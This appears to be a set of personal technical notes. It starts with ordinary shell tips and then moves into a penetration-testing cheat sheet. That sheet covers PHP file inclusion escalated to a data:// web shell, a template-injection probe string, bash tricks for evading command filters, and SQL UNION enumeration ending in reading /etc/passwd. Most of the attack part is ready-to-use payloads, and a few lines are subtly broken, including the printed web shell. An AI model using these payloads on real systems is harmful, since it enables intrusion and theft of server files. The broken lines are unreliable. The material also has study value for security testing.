ssh-add --apple-use-keychain --apple-load-keychain ~/.ssh/id_ed25519

References

• How to set up git signing 🌿

There’s no global setting to remove YouTube shorts, but I’ve found that by saying “not interested” to every one which pops up they’ve been removed from my feed.

Right now I’m not sure how long this will be in effect for, but it’s at least a temporary solution.

Reading and writing to the same file can in theory cause it to become truncated or corrupted so you can use sponge from moreutils to “soak up std out and write to a file” which ensures that the file is processed in entirety before redirecting the output back to the same file.

tail -r file.txt | sponge file.txt

Imagine a PHP file where you can perform LFI such as

curl http://example.com/vuln.php?lang=en.php

With a badly configured server and app you can use PHP read filters to get the full content

curl http://example.com/vuln.php?lang=php://filter/read=convert.base64-encode/resource=en.php

You can get a webshell or RCE if allow_url_include is enabled

curl http://example.com?vuln.php?lang=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Cg==%3D%3D&cmd=whoami

The shell is <?php system($_GET['cmd'];

The following string can be used to test a large number of templating engines in one go:

$ { { < % [ % ' " } } % \ .

[!IMPORTANT] Remove the spaces between each character! I’ve included them here because it messes up rendering in some places!

Inserting noop characters

Quotes (even number of non-mixed) will be ignored by bash. $ c'a't becomes $ cat. Similar for $ c"a"t

Backslashing chars (other than \n etc, obs) will have no effect. $ c\at becomes $ cat.

Use the positional param character $ c$@at becomes $ cat

Manipulate the characters

$(rev<<<'tac') becomes cat. Experiment with other things like rot13.

Encode the command

$(base64 -d<<<"Y2F0Cg==") becomes cat

Whitespace

• %0a: newline
• %20: space
• %09: tab
• ${IFS}: Input Field Separators ↗️ (typically space, tab, newline)
• bash bracket expansion: {ls,-la} turns into ls -la

Special characters

• forward slash: echo ${PATH:0:1}
• semicolon: echo ${LS_COLORS:10:1}
• pipe: try using <<<

Shifting characters

This command will shift a letter one to the right echo $(tr '!-}' '"-~'<<<[). e.g. ~ becomes !.

shift_generator() {
  local shift=$1
  local char=$2
  local second_start=$((33 + shift))
  local second_end=$((33 + shift - 1))
  printf "echo \$(tr '\\!-~' '"
  printf '%b-~\\!-%b' "$(printf '\\%03o' $second_start)" "$(printf '\\%03o' $second_end)"
  printf "'<<<'%s')\n" "$char"
}

# usage
shift_generator 1 "~" 

Tooling

For more advanced obfuscation you can consider tools such as:

Using a UNION injection we can find out about a (MySQL/MariaDB) structure.

Here are some minimal examples. Remember to determine the correct number of columns 🌿 and match that. Also clearly remember to add WHERE clauses to these to narrow down the search.

Databases

UNION SELECT SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA;

Tables

UNION SELECT TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.TABLES;

Columns

UNION SELECT COLUMN_NAME,TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS;

Privileges

UNION SELECT GRANTEE, PRIVILEGE_TYPE FROM INFORMATION_SCHEMA.USER_PRIVILEGES

References

• How to determine the number of columns for union SQL injection 🌿

After enumerating user privileges 🌿 if you find one which has FILE you can use that to read files from the target.

UNION SELECT LOAD_FILE('/etc/passwd')

References

• Enumerating databases, tables, columns, and user privileges with SQL injection 🌿
• Writing files with MySQL 🌱

Tools

• sqlmap ↗️ has a --proxy flag

Pro tip: remember to use proxychains 🌿 to proxy to burp for tools without proxy flags!

Techniques

• Writing files with MySQL 🌱
• Reading files with MySQL 🌱
• How to determine the number of columns for union SQL injection 🌿
• Enumerating database tables and columns with SQL injection 🌿